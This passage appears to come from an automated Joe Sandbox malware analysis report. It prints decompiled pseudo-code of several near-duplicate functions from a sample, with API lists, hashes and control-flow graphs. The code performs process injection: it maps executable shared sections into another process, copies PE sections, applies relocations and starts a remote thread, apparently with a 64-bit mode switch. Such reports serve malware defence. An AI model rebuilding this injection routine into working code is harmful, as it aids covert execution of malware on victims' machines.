				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t131 = _t194 - 0x30;
					 *_t131 = _t90;
					_t131[1] = _t171;
					_t180 = _t194 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t180, 0x18);
					 *_t180 = 0x18;
					_t155 = _t180;
					_push(_t194 - 0x30);
					_push(_t180);
					_push(0x40);
					_push(_t194 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t194 - 0x10), 0xffffffff, 0xffffffff, _t194 - 0xc, _t171, _t171, 2) == 0) {
						 *(_t194 - 8) = _t171;
						_t98 = _t194 - 0x50;
						 *(_t98 + 4) = _t171;
						 *_t98 = 0x5000;
						_t182 = _t194 - 0x54;
						if(NtCreateSection(_t182, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
							 *_t25 =  *(_t194 - 0x50);
							_t121 = _t194 - 0x44;
							 *_t121 = _t171;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t123 = _t194 - 0x3c;
								 *_t123 = _t171;
								if(NtMapViewOfSection( *_t182,  *(_t194 - 0xc), _t123, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
									_t193 =  *(_t194 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t171, _t193, 0x104);
									 *((intOrPtr*)(_t193 + 0x208)) =  *((intOrPtr*)(_t194 + 0x14));
									 *(_t194 - 8) =  *(_t194 - 8) + 1;
								}
							}
						}
						_t100 = _t194 - 0x50;
						 *(_t100 + 4) = _t171;
						 *_t100 =  *((intOrPtr*)(_t194 + 0x10)) + 0x10000;
						_t180 = _t194 - 0x58;
						if(NtCreateSection(_t180, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 &&  *(_t194 - 8) != 0) {
							 *_t46 =  *(_t194 - 0x50);
							_t102 = _t194 - 0x48;
							 *_t102 = _t171;
							if(NtMapViewOfSection( *_t180, 0xffffffff, _t102, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t104 = _t194 - 0x40;
								 *_t104 = _t171;
								_t216 = NtMapViewOfSection( *_t180,  *(_t194 - 0xc), _t104, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 0x20);
								if(_t216 == 0) {
									L19();
									if(_t216 == 0 && _t216 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t156 =  *_t196;
									_t200 =  &(_t196[1]);
									_push(_t156);
									_t106 =  *_t200;
									_t201 =  &(_t200[1]);
									_t157 = _t156 << 5;
									_t158 = _t157 + _t106;
									asm("lodsb");
									_t159 = _t158;
									asm("loop 0xffffffc3");
									_t160 = _t159 ^ 0xc66a5524;
									_t196 = _t201 - _t160;
									_t187 =  *((intOrPtr*)(_t194 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xc))));
									_t138 =  *(_t187 + 6) & 0x0000ffff;
									_push(_t187);
									_t161 = _t187;
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_t162 = _t161 + 0xf8;
										__eflags = _t162;
									} else {
										_t162 = _t161 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t162 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t194 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t194 + 0xc)), _t139);
										_t196 =  &(_t196[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t180);
									_t220 =  *((intOrPtr*)(_t194 - 0x34));
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_push(_t180);
										_t155 = _t180[0xd] -  *(_t194 - 0x40);
										_t190 = _t180[0x28] +  *(_t194 - 0x48);
										__eflags = _t190;
										while(1) {
											__eflags =  *_t190;
											if( *_t190 == 0) {
												break;
											}
											_t173 =  *_t190;
											_t190 = _t190 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t155;
												__eflags =  *((intOrPtr*)(0 +  *(_t194 - 0x48) + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t180);
										_t171 = 0;
										__eflags = 0;
										_t108 = _t194 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t194 - 0xc), 0, 0, 0, 0, 0, _t180[0xa] +  *(_t194 - 0x40),  *(_t194 - 0x3c), _t108, 0);
									} else {
										L52();
										_pop(_t174);
										_t171 = _t174 - 0x1781;
										 *((intOrPtr*)(_t171 + 0x17b5)) = _t171 + 0x2c1d;
										E00401256(_t127, _t171 + 0x17b5, _t171, _t180, _t220, _t171 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t171 + 0x17da)) = _t171 + 0x2c6d;
										_t155 =  *(_t194 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t196;
				_t197 =  &(_t196[1]);
				_push(0x37e);
				_t130 =  *_t197;
				return E004011BB(_t91, _t130, _t155, _t171, _t180, _t220, _t221);
			}










































                                                              0x004014f0
                                                              0x004014f0
                                                              0x004014f0
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 42ad22074bad18142d7be35822f8386c67ed3ecdea3813d17a0e8b73958593c3
                                                              • Instruction ID: 0e929ec6180768132d2eb4bc3befb4aa6e0e1ce8214f1ba9b47f90b2cd5cc351
                                                              • Opcode Fuzzy Hash: 42ad22074bad18142d7be35822f8386c67ed3ecdea3813d17a0e8b73958593c3
                                                              • Instruction Fuzzy Hash: 9B5108B5900255BFEF219F91CC48FAFBBB8FF85B10F104159FA11BA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 246 4014f4-401519 call 4011bb 251 40151b 246->251 252 40151e-401523 246->252 251->252 254 401845-40184d 252->254 255 401529-40153a 252->255 254->252 258 401540-401569 255->258 259 401843-401852 255->259 258->259 267 40156f-401586 NtDuplicateObject 258->267 261 401868 259->261 262 401859-401864 259->262 261->262 264 40186b-40188d call 4011bb 261->264 262->264 267->259 269 40158c-4015b0 NtCreateSection 267->269 272 4015b2-4015d3 NtMapViewOfSection 269->272 273 40160c-401632 NtCreateSection 269->273 272->273 275 4015d5-4015f1 NtMapViewOfSection 272->275 273->259 276 401638-40163c 273->276 275->273 277 4015f3-401609 275->277 276->259 278 401642-401663 NtMapViewOfSection 276->278 277->273 278->259 279 401669-401685 NtMapViewOfSection 278->279 279->259 281 40168b call 401690 279->281 281->259
                                                              C-Code - Quality: 61%
                                                              			E004014F4(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t130;
				signed int _t131;
				void** _t132;
				signed int _t139;
				int _t140;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				long _t172;
				intOrPtr _t174;
				void* _t175;
				HANDLE* _t181;
				HANDLE* _t183;
				void* _t188;
				intOrPtr* _t191;
				void* _t194;
				void* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t201;
				signed int* _t202;
				long _t217;

				_t222 = __fp0;
				_t156 = __edx;
				asm("aam 0x4a");
				_t130 = 0x37e;
				E004011BB(__ecx, _t130, __edx, __edi, __esi, __eflags, __fp0);
				_t127 =  *((intOrPtr*)(_t195 + 8));
				_t172 = 0;
				 *((intOrPtr*)(_t195 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t195 - 0x34)) =  *((intOrPtr*)(_t195 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t195 - 0x5c)) = _t87;
				_t181 = _t195 - 0x60;
				 *_t181 = _t172;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t181);
				_t90 =  *_t181;
				if(_t90 != 0) {
					_t132 = _t195 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t172;
					_t181 = _t195 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
					 *_t181 = 0x18;
					_t156 = _t181;
					_push(_t195 - 0x30);
					_push(_t181);
					_push(0x40);
					_push(_t195 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t195 - 0x10), 0xffffffff, 0xffffffff, _t195 - 0xc, _t172, _t172, 2) == 0) {
						 *(_t195 - 8) = _t172;
						_t98 = _t195 - 0x50;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t183 = _t195 - 0x54;
						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							 *_t25 =  *(_t195 - 0x50);
							_t121 = _t195 - 0x44;
							 *_t121 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t121, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 4) == 0) {
								_t123 = _t195 - 0x3c;
								 *_t123 = _t172;
								if(NtMapViewOfSection( *_t183,  *(_t195 - 0xc), _t123, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 4) == 0) {
									_t194 =  *(_t195 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t194, 0x104);
									 *((intOrPtr*)(_t194 + 0x208)) =  *((intOrPtr*)(_t195 + 0x14));
									 *(_t195 - 8) =  *(_t195 - 8) + 1;
								}
							}
						}
						_t100 = _t195 - 0x50;
						 *(_t100 + 4) = _t172;
						 *_t100 =  *((intOrPtr*)(_t195 + 0x10)) + 0x10000;
						_t181 = _t195 - 0x58;
						if(NtCreateSection(_t181, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t195 - 8) != 0) {
							 *_t46 =  *(_t195 - 0x50);
							_t102 = _t195 - 0x48;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t181, 0xffffffff, _t102, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 4) == 0) {
								_t104 = _t195 - 0x40;
								 *_t104 = _t172;
								_t217 = NtMapViewOfSection( *_t181,  *(_t195 - 0xc), _t104, _t172, _t172, _t172, _t195 - 0x38, 1, _t172, 0x20);
								if(_t217 == 0) {
									L17();
									if(_t217 == 0 && _t217 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t157 =  *_t197;
									_t201 =  &(_t197[1]);
									_push(_t157);
									_t106 =  *_t201;
									_t202 =  &(_t201[1]);
									_t158 = _t157 << 5;
									_t159 = _t158 + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc3");
									_t161 = _t160 ^ 0xc66a5524;
									_t197 = _t202 - _t161;
									_t188 =  *((intOrPtr*)(_t195 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t195 + 0xc))));
									_t139 =  *(_t188 + 6) & 0x0000ffff;
									_push(_t188);
									_t162 = _t188;
									if( *((intOrPtr*)(_t195 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t195 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t195 + 0xc)), _t140);
										_t197 =  &(_t197[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t181);
									_t221 =  *((intOrPtr*)(_t195 - 0x34));
									if( *((intOrPtr*)(_t195 - 0x34)) == 0) {
										_push(_t181);
										_t156 = _t181[0xd] -  *(_t195 - 0x40);
										_t191 = _t181[0x28] +  *(_t195 - 0x48);
										__eflags = _t191;
										while(1) {
											__eflags =  *_t191;
											if( *_t191 == 0) {
												break;
											}
											_t174 =  *_t191;
											_t191 = _t191 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t156;
												__eflags =  *((intOrPtr*)(0 +  *(_t195 - 0x48) + _t174));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t181);
										_t172 = 0;
										__eflags = 0;
										_t108 = _t195 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t195 - 0xc), 0, 0, 0, 0, 0, _t181[0xa] +  *(_t195 - 0x40),  *(_t195 - 0x3c), _t108, 0);
									} else {
										L50();
										_pop(_t175);
										_t172 = _t175 - 0x1781;
										 *((intOrPtr*)(_t172 + 0x17b5)) = _t172 + 0x2c1d;
										E00401256(_t127, _t172 + 0x17b5, _t172, _t181, _t221, _t172 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t172 + 0x17da)) = _t172 + 0x2c6d;
										_t156 =  *(_t195 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t197;
				_t198 =  &(_t197[1]);
				_push(0x37e);
				_t131 =  *_t198;
				return E004011BB(_t91, _t131, _t156, _t172, _t181, _t221, _t222);
			}









































                                                              0x004014f4
                                                              0x004014f4
                                                              0x004014f4
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: f1d7e44725552df3b8a433dca4a55b3c946ca18e27db3ab168963acc55609184
                                                              • Instruction ID: 46a14779cbf14933c6859ffc6b63d0487160ef9ff8ab9e0fd5fa9402c868ef7e
                                                              • Opcode Fuzzy Hash: f1d7e44725552df3b8a433dca4a55b3c946ca18e27db3ab168963acc55609184
                                                              • Instruction Fuzzy Hash: 705109B5900255BFEF219F91CC48FEFBBB8FF85B10F104159FA11AA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401501 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 283 401501-401519 call 4011bb 287 40151b 283->287 288 40151e-401523 283->288 287->288 290 401845-40184d 288->290 291 401529-40153a 288->291 290->288 294 401540-401569 291->294 295 401843-401852 291->295 294->295 303 40156f-401586 NtDuplicateObject 294->303 297 401868 295->297 298 401859-401864 295->298 297->298 300 40186b-40188d call 4011bb 297->300 298->300 303->295 305 40158c-4015b0 NtCreateSection 303->305 308 4015b2-4015d3 NtMapViewOfSection 305->308 309 40160c-401632 NtCreateSection 305->309 308->309 311 4015d5-4015f1 NtMapViewOfSection 308->311 309->295 312 401638-40163c 309->312 311->309 313 4015f3-401609 311->313 312->295 314 401642-401663 NtMapViewOfSection 312->314 313->309 314->295 315 401669-401685 NtMapViewOfSection 314->315 315->295 317 40168b call 401690 315->317 317->295
                                                              C-Code - Quality: 61%
                                                              			E00401501(void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t129;
				signed int _t130;
				void** _t131;
				signed int _t138;
				int _t139;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t161;
				intOrPtr* _t162;
				long _t171;
				intOrPtr _t173;
				void* _t174;
				HANDLE* _t180;
				HANDLE* _t182;
				void* _t187;
				intOrPtr* _t190;
				void* _t193;
				void* _t194;
				signed int* _t196;
				signed int* _t197;
				signed int* _t200;
				signed int* _t201;
				long _t216;

				_t221 = __fp0;
				_t155 = __edx;
				asm("sbb eax, 0x53f4eb29");
				_t129 = 0x37e;
				E004011BB(_t84, _t129, __edx, __edi, __esi, __eflags, __fp0);
				_t127 =  *((intOrPtr*)(_t194 + 8));
				_t171 = 0;
				 *((intOrPtr*)(_t194 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t194 - 0x34)) =  *((intOrPtr*)(_t194 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t194 - 0x5c)) = _t87;
				_t180 = _t194 - 0x60;
				 *_t180 = _t171;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t131 = _t194 - 0x30;
					 *_t131 = _t90;
					_t131[1] = _t171;
					_t180 = _t194 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t180, 0x18);
					 *_t180 = 0x18;
					_t155 = _t180;
					_push(_t194 - 0x30);
					_push(_t180);
					_push(0x40);
					_push(_t194 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t194 - 0x10), 0xffffffff, 0xffffffff, _t194 - 0xc, _t171, _t171, 2) == 0) {
						 *(_t194 - 8) = _t171;
						_t98 = _t194 - 0x50;
						 *(_t98 + 4) = _t171;
						 *_t98 = 0x5000;
						_t182 = _t194 - 0x54;
						if(NtCreateSection(_t182, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
							 *_t25 =  *(_t194 - 0x50);
							_t121 = _t194 - 0x44;
							 *_t121 = _t171;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t123 = _t194 - 0x3c;
								 *_t123 = _t171;
								if(NtMapViewOfSection( *_t182,  *(_t194 - 0xc), _t123, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
									_t193 =  *(_t194 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t171, _t193, 0x104);
									 *((intOrPtr*)(_t193 + 0x208)) =  *((intOrPtr*)(_t194 + 0x14));
									 *(_t194 - 8) =  *(_t194 - 8) + 1;
								}
							}
						}
						_t100 = _t194 - 0x50;
						 *(_t100 + 4) = _t171;
						 *_t100 =  *((intOrPtr*)(_t194 + 0x10)) + 0x10000;
						_t180 = _t194 - 0x58;
						if(NtCreateSection(_t180, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 &&  *(_t194 - 8) != 0) {
							 *_t46 =  *(_t194 - 0x50);
							_t102 = _t194 - 0x48;
							 *_t102 = _t171;
							if(NtMapViewOfSection( *_t180, 0xffffffff, _t102, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t104 = _t194 - 0x40;
								 *_t104 = _t171;
								_t216 = NtMapViewOfSection( *_t180,  *(_t194 - 0xc), _t104, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 0x20);
								if(_t216 == 0) {
									L18();
									if(_t216 == 0 && _t216 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t156 =  *_t196;
									_t200 =  &(_t196[1]);
									_push(_t156);
									_t106 =  *_t200;
									_t201 =  &(_t200[1]);
									_t157 = _t156 << 5;
									_t158 = _t157 + _t106;
									asm("lodsb");
									_t159 = _t158;
									asm("loop 0xffffffc3");
									_t160 = _t159 ^ 0xc66a5524;
									_t196 = _t201 - _t160;
									_t187 =  *((intOrPtr*)(_t194 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xc))));
									_t138 =  *(_t187 + 6) & 0x0000ffff;
									_push(_t187);
									_t161 = _t187;
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_t162 = _t161 + 0xf8;
										__eflags = _t162;
									} else {
										_t162 = _t161 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t162 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t194 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t194 + 0xc)), _t139);
										_t196 =  &(_t196[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t180);
									_t220 =  *((intOrPtr*)(_t194 - 0x34));
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_push(_t180);
										_t155 = _t180[0xd] -  *(_t194 - 0x40);
										_t190 = _t180[0x28] +  *(_t194 - 0x48);
										__eflags = _t190;
										while(1) {
											__eflags =  *_t190;
											if( *_t190 == 0) {
												break;
											}
											_t173 =  *_t190;
